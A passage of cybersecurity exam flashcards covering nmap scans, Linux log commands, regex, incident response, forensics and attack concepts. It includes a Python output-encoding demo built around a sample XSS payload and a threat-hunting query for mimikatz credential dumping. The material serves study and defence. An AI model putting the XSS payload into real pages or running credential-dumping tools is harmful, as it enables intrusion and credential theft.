supply false information to distort the adversary's understanding and awareness (ex. DNS redirect, honeypot)

Saved State Files (Virtualization Forensics)

suspending a VM writes its memory to a saved state file, which can then be loaded into a memory analysis tool

Why do we use a SPAN?

because network traffic must be captured and its data frames decoded before it can be analyzed

TTP (Tactics, Techniques, and Procedures)

behavior patterns that were used in historical cyber-attacks and adversary actions

Threat hunting and security monitoring must use ___________ techniques to identify infections

behavioral-based

User Acceptance Testing (UAT)

beta testing by the end users that proves a program is usable and fit-for-purpose in real-world conditions

Reputation data

blacklists of known threat sources, such as malware signatures, IP address ranges, and DNS domains

How do you prevent firewalking?

block outgoing ICMP status messages

How can WPS brute force attempts be mitigated?

by enabling rate-limiting for PIN authentications (*Important Note* ALWAYS disable WPS in your wireless networks)

Output Encoding

coding methods to sanitize output by converting untrusted output into a safe form where the input is displayed as data to the user without executing as code in the browser (mitigates against code injection and XSS attacks that attempt to use input to run a script)
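Output encoding in practice, showing that the encoding must match the context the data lands in (HTML body, HTML attribute, or a JavaScript string). This is an added example, not code from the original deck; the untrusted comment string is constructed for illustration.

```python
import html
import json

# Constructed untrusted input (a user comment), not real data
UNTRUSTED = '<img src=x onerror="alert(1)"> "quoted" & <script>steal()</script>'

def render_vulnerable(comment: str) -> str:
    # BAD: the raw string reaches the HTML body, so its tags become live markup
    return f"<p class='comment'>{comment}</p>"

def render_html_body(comment: str) -> str:
    # GOOD for element content: &, <, > (and quotes) become entities, so the
    # browser shows the text as data instead of parsing it as markup
    return f"<p class='comment'>{html.escape(comment)}</p>"

def render_html_attribute(comment: str) -> str:
    # GOOD for an attribute value: quote=True also encodes " and ', and the
    # template must quote the attribute so nothing can break out of it
    return f'<div data-comment="{html.escape(comment, quote=True)}"></div>'

def render_js_string(comment: str) -> str:
    # GOOD for a JavaScript string: JSON-encode the value, then escape '<' so a
    # literal "</script>" inside the data cannot close the surrounding script block
    encoded = json.dumps(comment).replace("<", "\\u003c")
    return f"<script>var comment = {encoded};</script>"

if __name__ == "__main__":
    for render in (render_vulnerable, render_html_body, render_html_attribute, render_js_string):
        print(render.__name__, "=>", render(UNTRUSTED))
```

The common mistake is applying one encoder everywhere: HTML-entity encoding does nothing to protect a JavaScript string, and JSON encoding alone leaves `</script>` intact, which is why each sink gets its own encoder.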

lsof -u root -a -p 1645

command that lists the files currently open on this host that were opened by the user root AND belong to process 1645 (-a makes the -u and -p selections a logical AND instead of lsof's default OR)

du /var/log

command that tells us how much space the log directory is using on this particular computer/host

Building Automation System (BAS)

components and protocols that facilitate the centralized configuration and monitoring of mechanical and electrical systems within offices and data centers

nmap -sU (UDP Scan)

conducts a scan by sending a UDP packet to the target and waiting for a response or timeout

nmap -sX (Xmas Scan)

conducts a scan by sending a packet with the FIN, PSH, and URG flags set to one

nmap -sN (Null Scan)

conducts a scan by sending a TCP packet with no flags set (all flag bits zero)

nmap -sF (FIN Scan)

conducts a scan by sending an unexpected FIN packet

nmap -p (Port Range)

conducts a scan by targeting the specified ports instead of the default of the 1,000 most commonly used ports

nmap -sT (TCP Connect)

conducts a three-way handshake scan by sending a SYN packet to identify the port state and then sending an ACK packet once the SYN-ACK is received

nmap -sS (TCP SYN)

conducts half-open scan by sending a SYN packet to identify the port state without sending an ACK packet afterwards (requires root/administrator access to perform)

DNS Event Logs

contains a log of all the different events for each time the DNS server handles a request to convert between a domain name and an IP address

Work Product Retention

contractual method of retaining (hiring) forensic investigators so that their analysis is protected from disclosure by the work product doctrine

Access Complexity (AC) (CVSS)

high (H) or low (L)

Listener/Collector (Data Normalization)

hosts are configured to push updates to the SIEM server using a protocol like syslog or SNMP

Attribution

identification and publication of an attacker's methods, techniques, and tactics as useful threat intelligence

Framework Core

identifies five cybersecurity functions (Identify, Protect, Detect, Respond, and Recover) and each function can be divided into categories and subcategories

User-Agent Field

identifies the type of application making the request, such as the web browser version or the client's operating system

Detect

identify the presence of an adversary and the resources at their disposal (ex. Web analytics, NIDS, Vigilant user, HIDS, Audit log)

When is Sinkholing better than Blackholing?

if you want to determine the cause of the DDoS attack

VirusTotal (EDR Configuration)

inspects items with over 70 antivirus scanners and URL/domain blacklisting services, in addition to a myriad of tools to extract signals from the studied content

patching

installing a set of changes to a computer program or its supporting data designed to update, to fix, or to improve it (process: scan, patch, scan)

*Important Note* Analysts should always have forensic workstations prohibited from accessing the

internet (because if it is connected, there's a possibility your forensic workstation could be compromised with malware or a remote access trojan, compromising the integrity of your evidence)

Correlation

interpreting the relationship between individual data points to diagnose incidents of significance to the security team

Disruption

interrupt an adversary's communications or frustrate or confuse their efforts (ex. in-line AV, DEP, NIPS)

Containment (Incident Response Phases)

limit the scope and magnitude of the incident by securing data and limiting impact to business operations and your customers

nmap -sL (List Scan)

lists the IP addresses from the supplied target range(s) and performs a reverse-DNS query to discover any host names associated with those IPs (similar to DNS lookup)

Insufficient Logging and Monitoring (Cloud Threats)

logs must be copied to non-elastic storage for long-term retention (*WARNING: SaaS may not supply access to log files or monitoring tools)

Processor Security Extensions

low-level CPU changes and instructions that enable secure processing (built into your microprocessor) 1. AMD: Secure Memory Encryption (SME) & Secure Encrypted Virtualization (SEV) 2. Intel: Trusted Execution Technology (TXT) & Software Guard Extensions (SGX)

_________ is expressed as a monetary value

magnitude

Obfuscated Malware Code

malicious code whose execution the malware author has attempted to hide through various techniques such as compression, encryption, or encoding to severely limit attempts to statically analyze the malware

Commodity Malware

malicious software applications that are widely available for sale or easily obtainable and usable

________ is still likely to leave metadata on the file system even if it is fileless

malware

Dropper

malware designed to install or run other types of malware embedded in a payload on an infected host (stage 1)

Volume-based Analysis

measures a metric based on the size of something, such as disk space used or log file size

flow (rule options)

matches a new or existing TCP connection OR matches regardless of the TCP connection state

*Important Note* While most of the Windows registry is stored on the disk, some keys (like HKLM\HARDWARE) exist only in memory, so you should analyze the Registry via a

memory dump

[ ] (regex syntax)

matches a single instance of a character within the brackets, such as [a-z] (lowercase letter), [A-Z] (uppercase letter), [0-9] (number), [a-zA-Z0-9] (finds me an uppercase, lowercase, or number as a single digit or single character from that range), [\s] (white space), or [\d] (single digit)

+ (regex syntax)

matches one or more occurrences and is called a quantifier, such as \d+ matching one or more digits

? (regex syntax)

matches one or none times, such as \d? matching zero or one digits

{ } (regex syntax)

matches the number of times within the curly braces, such as \d{3} matching exactly three digits or \d{7,10} matching seven to ten digits

* (regex syntax)

matches zero or more occurrences, such as \d* matching zero or more digits
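The five regex cards above ([ ], +, ?, { }, *) applied together to pull failed SSH logons out of log lines. This is an added example, not code from the original deck; the sshd lines are constructed for illustration.

```python
import re

# Constructed sshd log lines (not real data); the last one has trailing spaces
LOG_LINES = [
    "Mar  1 09:14:02 bastion sshd[2211]: Failed password for invalid user admin from 203.0.113.7 port 51022 ssh2",
    "Mar  1 09:14:05 bastion sshd[2211]: Failed password for root from 203.0.113.7 port 51024 ssh2",
    "Mar  1 09:15:40 bastion sshd[2290]: Accepted publickey for deploy from 10.0.0.12 port 40112 ssh2",
    "Mar 12 23:59:59 bastion sshd[3310]: Failed password for root from 198.51.100.23 port 6022 ssh2   ",
]

# Each card's construct as used in the pattern below:
#   [ ]  character class        [A-Z][a-z]{2}       month abbreviation
#   { }  counted repetition     \d{1,3}, \d{2}      IPv4 octet, hours/minutes/seconds
#   +    one or more            \d+ and ' +'        PID or port of any width, one or more spaces
#   ?    zero or one            (?:invalid user )?  optional phrase
#   *    zero or more           \s*                 trailing whitespace before end of line
FAILED_LOGIN = re.compile(
    r"^(?P<month>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) (?P<time>\d{2}:\d{2}:\d{2}) "
    r"(?P<host>\S+) sshd\[(?P<pid>\d+)\]: Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>(?:\d{1,3}\.){3}\d{1,3}) port (?P<port>\d+) ssh2\s*$"
)

def valid_ipv4(text: str) -> bool:
    """The 1-to-3-digit octet pattern also accepts 999, so check ranges separately."""
    return all(0 <= int(octet) <= 255 for octet in text.split("."))

def parse_failed_logins(lines):
    """Return one dict of named groups per line that is a failed-password event."""
    records = []
    for line in lines:
        m = FAILED_LOGIN.match(line)
        if m and valid_ipv4(m["ip"]):
            records.append(m.groupdict())
    return records

def failures_by_ip(lines):
    """Count failed logons per source address, the usual first pivot."""
    counts = {}
    for rec in parse_failed_logins(lines):
        counts[rec["ip"]] = counts.get(rec["ip"], 0) + 1
    return counts

if __name__ == "__main__":
    for rec in parse_failed_logins(LOG_LINES):
        print(rec["time"], rec["user"], rec["ip"], rec["port"])
    print(failures_by_ip(LOG_LINES))
```

Anchoring with ^ and $ and using named groups keeps the pattern honest: a line that does not fit the whole layout is skipped rather than partially matched, and the octet range check covers the case the quantifier alone cannot express.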

Document Matching (DLP Discovery and Classification)

matching based on an entire or partial document based on hashes

Watermarking

methods and technologies that apply a unique anti-tamper signature or message to a copy of a document

URL Modifier

modifiers that can be added to the results page to affect the results, such as &pws=0 (means dont give me personalized results), &filter=0 (means dont filter the results) , and &tbs=li:1 (means do not autocorrect my search items)

"Smash the Stack"

occurs when an attacker overflows the buffer with a run of NOP (no-operation) instructions, a NOP sled, followed by the payload, so that an imprecisely overwritten return address landing anywhere in the sled slides forward into the attacker's code

Service Defacement (Anomalous Activity)

occurs when an attacker gains control of a web server and alters the websites presentation

File carving ... (Virtualization Forensics)

of a virtual machine's virtualized hard drive can identify files in the unallocated and slack space of disk images

________ and ________ is used to interpret data from different formats and standardize them into a single format for analysis and processing (Data Normalization)

parsing + normalization

Web Application Firewall

protects web applications from a variety of application layer attacks such as XSS, SQL injection, code injection, etc.

Continuous Diagnostics and Mitigation (CDM)

provides US government agencies and departments with capabilities and tools to identify cybersecurity risks on an ongoing basis, prioritize these risks based upon potential impacts, and enable cybersecurity personnel to mitigate the most significant problems

DomainKeys Identified Mail (DKIM)

provides a cryptographic authentication mechanism for mail utilizing a public key published as a DNS record

Google Hacking Database (GHDB)

provides a database of search strings optimized for locating vulnerable websites and services

Degrade

reduce an adversary's capabilities or functionality, perhaps temporarily (ex. Queuing, Tarpit, Quality of Service)

Physical Network (Network Architectures)

refers to the cabling, switch ports, router ports, and wireless access points that supply cabled and wireless network access and connectivity (also includes physical security controls that are important in protecting your physical network architecture)

recycled threats

refers to the process of combining and modifying parts of existing exploit code to create new threats that are not as easily identified by automated scanning

Eradication & Recovery (Incident Response Phases)

remove the cause of the incident and bring the system back to a secure state

Destroy

render an adversary's resources permanently useless or ineffective

How do you prevent CSRF attacks?

request user-specific tokens in all form submissions

Stack

reserved area of memory where the program saves the return address when a function call instruction is received

What is a key indicator of malicious activity?

resource consumption

HEAD (URL Analysis)

retrieves the headers for a resource only and ignores the body

cut -c5 syslog.txt

returns only the fifth character in each line from the syslog.txt file

cut -c5-10 syslog.txt

returns only the fifth through tenth characters in each line from the syslog.txt file

sort syslog.txt

returns the contents of the syslog.txt file in alphabetical order (a-z)

sort -n syslog.txt

returns the contents of the syslog.txt file in numerical order (0-9)

sort -k2 syslog.txt

returns the contents of the syslog.txt file in order based on the column specified, in this case the second column

sort -t "," -k2 syslog.txt

returns the contents of the syslog.txt file in order based on the column specified, such as the second column, while delimiting the columns using comma separated values

sort -r syslog.txt

returns the contents of the syslog.txt file in reverse alphabetical order (z-a)

cut -d " " -f1-4 syslog.txt

returns the first four entries of each line as delimited by the " " (space character)

Reflected, non-persistent, and persistent XSS attacks occur as ________ scripting attacks

server-side (the malicious script is injected through the server's response; DOM-based XSS is the client-side variant)

Always use ________ _______ to conduct credentialed scans, not local administrative privileges

service accounts

Federal Information Security Management Act (FISMA)

sets forth the requirements for federal organizations to adopt information assurance controls

Sarbanes-Oxley Act (SOX)

sets forth the requirements for the storage and retention of documents relating to an organization's financial and business operations, including the type of documents to be stored and their retention periods (applies to publicly traded companies)

Gramm-Leach-Bliley Act (GLBA)

sets forth the requirements that help protect the privacy of an individual's financial information that is held by financial institutions and others

Health Insurance Portability and Accountability Act (HIPAA)

sets forth the requirements that help protect the privacy of an individual's health information that is held by healthcare providers, hospitals, and insurance companies

You are conducting an intensive vulnerability scan to detect which ports might be open to exploitation. During the scan, one of the network services becomes disabled and causes an impact on the production server. Which of the following sources of information would provide you with the most relevant information for you to use in determining which network service was interrupted and why?

syslog

The ____ command allows you to see the 10 most recent log entries in a file

tail

Risk Identification

takes place by evaluating threats, identifying vulnerabilities, and assessing the probability of an event affecting an asset or process

attackers can use _________ techniques to bury their attacks within the network noise

sparse attack (trend analysis can be used to identify these attacks)

Adversaries often use _______ _______ to reduce packets sizes and hide in the noise of the other network traffic

sparse delivery

IOC for Data Exfiltration Using HTTP

spikes in requests to PHP files or other scripts, and unusually large HTTP response packets

Maximum Tolerable Downtime (MTD) *

the longest period of time a business can be inoperable without causing irrevocable business failure

Recovery Point Objective (RPO) *

the longest period of time that an organization can tolerate lost data being unrecoverable (focused on how long you can be without your data)

Zones

the main unit of a logically segmented network (using ACLs) where the security configuration is the same for all hosts within it (e.g., DMZ)

Data Acquisition

the method and tools used to create a forensically sound copy of data from a source device, such as system memory or a hard disk

Client-based Error Codes

status codes in the 400 range

Server-based Error Codes

status codes in the 500 range

Covert Channels can be created using different ________ and ________ methods

storage, timing

Agent-based Scanning

the vulnerability scanning is conducted using a software application installed locally on each target

Server-based Scanning (Vulnerability Scanner Types)

the vulnerability scanning is launched from one or more scanning servers against the targets (ex. Nessus)

sid and rev (rule options)

this is going to be either the rule's ID, the Snort ID (sid), OR it's going to be rev, which is the version (the revision number of that rule)

Port 3306 (TCP)

MySQL (MySQL database connection)

Port 4500 (UDP port)

NAT-T-IKE (used to set up IPsec traversal through a NAT gateway)

systemctl

Linux command that can list and monitor the startup processes using the appropriate control for the init daemon (startup process that happens every time you start the Linux system)

top

Linux command that creates a scrollable table of every running process and is constantly refreshed so that you see the most up-to-date statistics

faillog (new accounts)

Linux command that displays only authentication failures

chmod

Linux command that is used to modify permissions for files

chown

Linux command that is used to modify the owner of a file

free

Linux command that outputs a summary of the amount of used and freely available memory on the computer

lastlog (new accounts)

Linux command that retrieves the log-on history from the /var/log/lastlog file and displays the account name, the TTY, the remote host, and the last time the user was logged in

who (new accounts)

Linux command that shows what user accounts are logged in, what terminal teletypes (TTYs) they have active for each running process, and what date/time they logged in (useful for adversary hunting)

du

Linux tool that enables you to retrieve how much disk space each directory is using based on the specified directory

lsof

Linux tool that retrieves a list of all files currently open on the OS (can quickly get a list of all resources a process is currently using)

df

Linux tool that retrieves how much disk space is being used by all mounted file systems and how much space is available for each

how do you create a search query to send an alert if multiple user log-on failures occur within one hour from a single account

Select (user) Where (Error.LogonFailure > 3 AND LogonFailure.User AND Duration < 1 hour) Sorted By (date, time)

A company's NetFlow collection system can handle up to 2 Gbps. Due to excessive load, this has begun to approach full utilization at various times of the day. If the security team does not have additional money in their budget to purchase a more capable collector, which of the following options could they use to collect useful data?

enable sampling of the data

Collection (Forensic Procedures)

ensure authorization to collect evidence is obtained (e.g., warrant), and then document and prove the integrity of evidence as it is collected

logging

ensure that scanning and monitoring/log retrieval systems are functioning properly following the incident

Identification (Forensic Procedures)

ensure the scene is safe, secure the scene to prevent evidence contamination, and identify the scope of evidence to be collected

A cybersecurity analyst is conducting proactive threat hunting on a network by correlating and searching the Sysmon and Windows Event logs. The analyst uses the following query as part of their hunt:

Query: "mimikatz" NOT "EventCode=4658" NOT "EventCode=4689" EventCode=10 | stats count by _time, SourceImage, TargetImage, GrantedAccess

Based on the query above, which of the following potential indicators of compromise is the threat hunter relying on?

unauthorized software

Scope (S) (CVSS)

unchanged (U) or changed (C)

a ________ rootkit is able to gain complete control over the system

kernel mode (more dangerous)

Segmentation Containment

- a mitigation strategy that achieves the isolation of a host or group of hosts using network technologies and architecture - uses VLANs, routing/subnets, and firewall ACLs to prevent communication outside the protected segment (ex. sandboxing, honeypots) - can be used to reroute adversary traffic as part of a deception defensive capability

Isolation Containment

- a mitigation strategy that involves removing an affected component from whatever larger environment it is a part of - ensure there is no longer an interface between the affected component and your production network or the Internet (ex. airgap)

Kill Chain (Attack Framework)

- a model developed by Lockheed Martin that describes the stages by which a threat actor progresses a network intrusion - 7 stages (Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command & Control, Actions on Objectives)

Behavioral Analysis

- a network monitoring system that detects changes in normal operating data sequences and identifies abnormal sequences - generates an alert whenever anything deviates outside a defined level of tolerance from a given baseline (outliers)

Anomaly Analysis

- a network monitoring system that uses a baseline of acceptable outcomes or event patterns to identify events that fall outside the acceptable range - generates an alert on any event or outcome that doesn't follow a set pattern or rule

Event Logs

- logs created by the operating system on each client or server to record how users and software interact with the system - event logs provide the name of the event, details of any errors, the event ID, the source of the event and a description of what the warning/error means

Preparation (Incident Response Phases)

- make the system resilient to attack by hardening systems, writing policies and procedures, and setting up confidential lines of communication - preparing for an incident response involves documenting your procedures, putting resources and procedures in place, and conducting training

Industrial Control Systems (ICS)

- a network that manages embedded systems (one plant) - used for electrical power stations, water suppliers, health services, telecommunications, manufacturing, and defense needs - manages the process automation by linking together PLCs using a fieldbus to make changes in the physical world (valves, motors, etc.)

Distributed Reflection DoS (DRDoS) Attack

- a network-based attack where the attacker dramatically increases the bandwidth sent to a victim during a DDoS attack by implementing an amplification factor - occurs when the adversary spoofs the victim's IP address and tries to open connections with multiple servers

Lateral Movement

- a technique to progressively move through a network to search for the key data and assets that are ultimately the target of an attack campaign - identifying irregular peer-to-peer communication can identify lateral movement

Supervisory Control and Data Acquisition (SCADA)

- a type of industrial control system (ICS) that manages large-scale, multiple-site devices and equipment spread over a geographic region (multiple plants) - typically run as software on ordinary computers to gather data from and manage plant devices and equipment with embedded PLCs

Reverse Proxy

- a type of proxy server that protects servers from direct contact with client requests - logs from a reverse proxy can be analyzed for indicators of attack or compromise, such as malicious code in HTTP request headers and URLs

Port 23 (TCP)

Telnet (an unsecure remote administration interface)

How can you detect privilege escalation? *

- by monitoring authentication and authorization systems (5 things to look for below) 1. unauthorized sessions 2. failed log-ons 3. new accounts 4. guest account usage 5. off-hours usage

Blackholing *

- can be used to stop a DDoS attack at the routing layer by sending traffic to the null0 interface - useful against Dark Nets - redirect all Dark Nets to a black hole until they are needed for business operations

Live Acquisition (System Memory Image Acquisition )

- capturing the contents of memory while the computer is running using a specialist hardware/software tool (e.g., Memoryze from FireEye and F-Response from TACTICAL) - generates a snapshot of data that is changing second-by-second

Act (with Example)

- carry out the decision and related changes that need to be made in response to the decision - (ex.) the user's system is isolated by an incident responder, who then begins to observe again for additional indicators

Hashcat

- a command-line tool used to perform brute force and dictionary attacks against password hashes - relies on GPUs (graphical processing units) instead of CPUs to perform brute force cracking more quickly

Responder

- a command-line tool used to poison responses to NetBIOS, LLMNR, and mDNS name resolution requests in an attempt to perform a MitM attack - designed to intercept LLMNR and NBT-NS requests and return the attacker's host IP as the name record

Modbus (ICS/SCADA)

- a communications protocol used in operational technology (OT) networks - gives control servers and SCADA hosts the ability to query and change the configuration of each PLC

Decide (with Example)

- makes suggestions towards an action or response plan while taking into consideration all of the potential outcomes - (ex.) the user's system was compromised, malware was installed by the attacker, and we should isolate the system

data submitted via a URL is delimited by the ___ character (URL Analysis)

?

Cousin Domains

A DNS domain that looks similar to another name when rendered by a Mail User Agent (MUA)

What are 2 ways SQL Injection attacks can be prevented/mitigated?

*input validation* and using least privilege when accessing a database

Sysinternals

- A suite of tools designed to assist with troubleshooting issues with Windows, and many of the tools are suited to investigating security issues - Process Explorer (one of the tools) can filter out legitimate activity (known-good) to look for signs of anomalous behavior (comparing suspicious events to your baseline)

Software-Defined Networking (SDN) *

- APIs and compatible hardware allowing for programmable network appliances and systems (essentially taking our physical networks and virtualizing them) - allows for automatic deployment and disaster recovery 1. control plane (makes decisions about how traffic should be prioritized and secured, and where it should be switched) 2. data plane (handles the actual switching and routing of traffic and imposition of ACLs for security) 3. management plane (monitors traffic conditions and network status)

Improper Key Management (Cloud Threats)

- APIs should use secure authentication and authorization such as SAML or OAuth/OIDC before accessing data - delete unnecessary keys and regenerate new keys when moving into the production environment - ensure that hardening policies are in place for your servers and workstations (*WARNING: do NOT hardcode or embed a key into the source code*)

Port 53 (UDP)

- DNS - uses UDP for DNS queries

Port 53 (TCP)

- DNS (domain name system - translates our IPs to names and our names to IPs) - uses TCP for zone transfers

Observe (with Example)

- Identify the problem or threat and gain an overall understanding of the internal and external environment - (ex.) An alert in your SIEM has been created due to an employee clicking on a link in an email

Orient (with Example)

- Involves reflecting on what has been found during observations and considering what should be done next - (ex.) identify the user's permissions, any changes identified in the user's system, and potential goals of attacker

ps

- Linux command that lists the attributes of all current processes - this command shows only processes started by the current user by default - * ps -A or ps -e will provide a full list of all running processes for all users *

OWASP *

- Open Web Application Security Project's security framework for secure application development - a charity and community that publishes a number of secure application development resources

What is the difference between SOA and Microservices?

- SOA allows applications to be built from services with interdependencies - Microservices are capable of being developed, tested, and deployed independently (easily scalable without interdependencies)

NetFlow

- a Cisco-developed means of reporting network flow information to a structured database - doesn't show the full packet captures, so you will not have a complete record of what's happening

Golden Tickets

- a Kerberos ticket that can grant other tickets in an Active Directory environment - can grant administrative access to other domain members and domain controllers - allow attackers to laterally move across the entire domain with ease (*Important Note* administrators should change the krbtgt account password regularly)

Alien Vault and OSSIM (Open-Source Security Information Management)

- a SIEM solution originally developed by Alien Vault, now owned by AT&T, and rebranded as AT&T Cybersecurity - OSSIM can integrate other open-source tools, such as Snort IDS and OpenVAS vulnerability scanner, and provide an integrated web administrative tool to manage the whole security environment (all in one solution)

Maturity Model

- a component of an ESA (enterprise security architecture) framework that is used to assess the formality and optimization of security control selection and usage and address any gaps (5 levels) 1. Level 1 - Initial (highly reactive in nature) 2. Level 2 - Managed (prepare to mitigate through risk assessments) 3. Level 3 - Defined (defined policies and procedures) 4. Level 4 - Quantitatively Managed (management oversight of risks) 5. Level 5 - Optimizing (fully proactive risk-driven approach)

Hardware Root of Trust (ROT)

- a cryptographic module embedded within a computer system that can endorse trusted execution and attest to boot settings and metrics (e.g., TPM) - essentially it is used to scan the boot metrics and OS files to verify their signatures, and then it signs the report (digital certificate embedded inside your processor or firmware)

Threat Hunting

- a cybersecurity technique designed to detect presence of threats that have not been discovered by normal security monitoring - steps to threat hunting: analyze network traffic, analyze the executable process list, analyze other infected hosts, identify how the malicious process was executed - threat hunting consumes a lot of resources and time to conduct but can yield a lot of benefits - benefits include: improve detection capabilities, integrate intelligence, reduce attack surface, block attack vectors, identify critical assets

EnCase (Forensic Tools)

- a digital forensics case management product created by Guidance Software with built-in pathways or workflow templates that show the key steps in many types of investigations (used for both data acquisition and analysis) - file format = .e01 - also supports .dd format (disk duplication file - industry standard)

The Forensic Toolkit (FTK)

- a digital forensics investigation suite by AccessData that runs on Windows Server or server clusters for faster searching and analysis due to data indexing when importing evidence - file format = .aff - also supports .dd format

Controller Area Network (CAN)

- a digital serial data communications network used within vehicles (airplanes, cars, trains) - the primary external interface is the Onboard Diagnostics (OBD-II) module

Web Application Firewall (WAF)

- a firewall designed specifically to protect software running on web servers and their backend databases from code injection and DoS attacks - used to prevent web-based exploits and vulnerabilities like SQL injection, XML injection, and cross-site scripting (XSS) attacks

Adversary Capability

- a formal classification of resources and expertise available to a threat actor

Prescriptive Framework

- a framework that stipulates control selection and deployment - driven by regulatory compliance

Network Access Control (NAC) *

- a general term for the collected protocols, policies, and hardware that authenticate and authorize access to a network at the device level (best option of the 3) - provides the means to authenticate users and evaluate device integrity BEFORE a network connection is permitted - relies on 802.1X

Zeek (Bro)

- a hybrid tool that passively monitors a network like a sniffer and only logs data of potential interest - essentially, it's going to be sampling that data just like NetFlow does, but when it finds something interesting it's going to log the entire thing - this helps reduce our storage and processing requirements + gives us the ability to have all this data in one single format - performs normalization of the data using JSON

Application Programming Interface (API)

- a library of programming utilities used to enable software developers to access functions of another application - allows for the automated administration, management, and monitoring of a cloud service and applications (commonly use REST or SOAP as their frameworks)

HTTP Access Logs

- a log containing HTTP traffic that encountered an error or traffic that matches some pre-defined rule set - relevant information is recorded in the common log format (CLF) or W3C extended log file format - status codes of responses indicate if an error was caused by the client or server

Cross-Site Scripting (XSS)

- a malicious script hosted on the attacker's site or coded in a link injected onto a trusted site designed to compromise clients browsing the trusted site, circumventing the browser's security model of trusted zones - breaks the browser's security model since browsers assume scripting is safe (*XSS is a powerful input validation exploit*)

Beaconing

- a means for a network node to advertise its presence and establish a link with other nodes (gives an attacker the ability to establish a C2 server to communicate with malware on the infected host) - malicious beaconing usually takes the form of a simple ping or heartbeat to verify the bot is still alive in the botnet (can happen at regular intervals or different times) - beaconing can be used legitimately, such as a beacon management frame being sent by a wireless access point for normal network communications (NTP servers, auto update and patching systems, cluster services) (*Exam Tip: traditional beaconing occurs in regular intervals, such as every 5 seconds, every 15 minutes, every day, etc.*)

Black Hole *

- a means of mitigating DoS or intrusion attacks by silently dropping (discarding) traffic - more effective than using an ACL and a firewall - can be done at the firewall level (requires more processing power) or router level (more efficient method)

Percent Encoding

- a mechanism to encode 8-bit characters that have specific meaning in the context of URLs, also known as URL encoding - whenever you see percent encoding typically something is hidden there and further investigation is needed

DNS Zone Transfer

- a method of replicating DNS databases across a set of DNS servers that is often used during the reconnaissance phase of an attack - a zone transfer can be used to collect DNS information about your servers and give it to an attacker to plan further attacks

Heuristic Analysis

- a method that uses feature comparisons and likenesses rather than specific signature matching to identify whether the target of observation is malicious - uses machine learning to alert on behavior that is similar enough to a signature or rule

Trusted Foundry

- a microprocessor manufacturing utility that is part of a validated supply chain (one where hardware and software does not deviate from its documented function) - created and operated by the DoD

Pass the Hash

- a network-based attack where the attacker steals hashed user credentials and uses them as-is to try to authenticate to the same network the hashed credentials originated on - it is possible to present the hash without cracking the original password to authenticate to network protocols such as SMB and Kerberos - commonly used to elevate privileges (when pass the hash is used on a local workstation, an attacker can gain local admin privileges) - (*Important Note* domain administrative accounts should ONLY be used to log on to domain controllers to prevent pass the hash from exploiting your domain)

Packet Sniffer

- a piece of hardware or software that records data from frames as they pass over a network media using methods such as a mirrored port or tap device - make sure a network sniffer is placed inside a firewall or close to an important server - you can deploy multiple sniffers within your network - tcpdump and Wireshark

Staging Areas (Disk and File System)

- a place where an adversary begins to collect data in preparation for data exfiltration, such as temporary files and folders, user profile locations, data masked as logs, alternate data streams (ADS), or in the recycle bin - data is often compressed and encrypted in the staging area (IOC#1)

Malicious Process

- a process executed without proper authorization from the system owner for the purpose of damaging or compromising the system - malware code will often be injected into a host process by making it load the malware code as a dynamic link library (DLL) within Windows - malware often uses injection into Linux shared libraries (Shared Objects or .so files)

Federation

- a process that provides a shared login capability across multiple systems and enterprises - allows the company to trust accounts created and managed by a different network

System-on-Chip (SoC) (Embedded System)

- a processor that integrates the platform functionality of multiple logical controllers onto a single chip (combines multiple PLCs into one chip) - power efficient and used with embedded systems

Burp Suite

- a proprietary interception proxy and web application assessment tool - allows for the automated scanning of vulnerabilities and crawling of an application to discover content, while providing tools for automating the modification of requests and insertion of exploits

Syslog (Mac or Linux)

- a protocol enabling different appliances and software applications to transmit logs or event records to a central server - follows a client-server model and is the de facto standard for logging of events from distributed systems across the network - syslog can refer to the protocol, the server, or the log entries themselves - runs on port 514 (UDP) over TCP/IP

NIST Cybersecurity Framework

- a risk-based framework that is focused on IT security over IT service provision - covers three main areas: framework core, implementation tiers and framework profiles

HTTP Method (URL Analysis)

- a set of request methods to indicate the desired action to be performed for a given resource - a request contains a method, a resource, a version number, the header, and the body of the request

Conditional Analysis

- a simple form of correlation performed by a machine by using signature detection and rules-based policies (IF x AND y OR z) - drawback is this type of analysis creates large numbers of false positives and cannot find zero-day or new TTPs

Endpoint Protection Platform (EPP) (endpoint protection tool)

- a software agent and monitoring system that performs multiple security tasks such as anti-virus, HIDS/HIPS, firewall, DLP, and file encryption - focused on signature-based detection

Endpoint Detection and Response (EDR)

- a software agent that collects system data and logs for analysis by a monitoring system to provide early detection of threats - focused on behavioral and anomaly analysis

Data Loss Prevention (DLP)

- a software solution that detects and prevents sensitive information from being stored on unauthorized systems or transmitted over unauthorized networks (made up of 3 components) 1. policy server (used to configure classification, confidentiality and privacy rule sets, logging + reporting) 2. endpoint agents (used to enforce policy on client computers) 3. network agents (scans network activity and protects things from leaving your network)

Heap Overflow

- a software vulnerability where input is allowed to overwrite memory locations within the area of a process' memory allocation used to store dynamically-sized variables - can overwrite those variables and possibly allow arbitrary code execution

SIEM

- a solution that provides real-time or near-real-time analysis of security alerts generated by network hardware and applications (detection and monitoring capabilities) - helps us correlate events

Attack Vector

- a specific path by which a threat actor gains unauthorized access to a system - 3 main areas to consider: cyber, human, physical

Trusted Platform Module (TPM)

- a specification for hardware-based storage of digital certificates, keys, hashed passwords, and other user and platform identification information - part of your system that allows you to have the ability to ensure that when your booting up, it is done securely and we can take those reports and digitally sign them

STIX (Structured Threat Information eXpression - Indicator Management) *

- a standard terminology for IoCs and ways of indicating relationships between them that is included as part of the OASIS Cyber Threat Intelligence (CTI) framework - JSON format (attributes and values) - STIX is built from high-level STIX domain objects (SDOs) that contain multiple attributes and values

Aircrack-ng Suite (Wireless Assessment Tools)

- a suite of utilities designed for wireless network security testing (4 tools inside of it) 1. airmon-ng 2. airodump-ng 3. aireplay-ng 4. aircrack-ng

User and Entity Behavior Analytics (UEBA) *

- a system that can provide automated identification of suspicious activity by user accounts and computer hosts - starts with a good baseline and then compares anything that goes outside that baseline as something suspicious - UEBA solutions are heavily dependent on advanced computing techniques like artificial intelligence (AI) and machine learning (heavily focuses on analytics)

URL Analysis

- activity that is performed to identify whether a link is already flagged on an existing reputation list, and if not, to identify what malicious script or activity might be coded within it - need to use the right tools to be able to: resolve percent encoding, assess redirection of the URL, show source code for scripts in the URL - all of this needs to be performed in a sandbox environment so you don't infect your own machine

How do you mitigate false positives when performing a vulnerability scan?

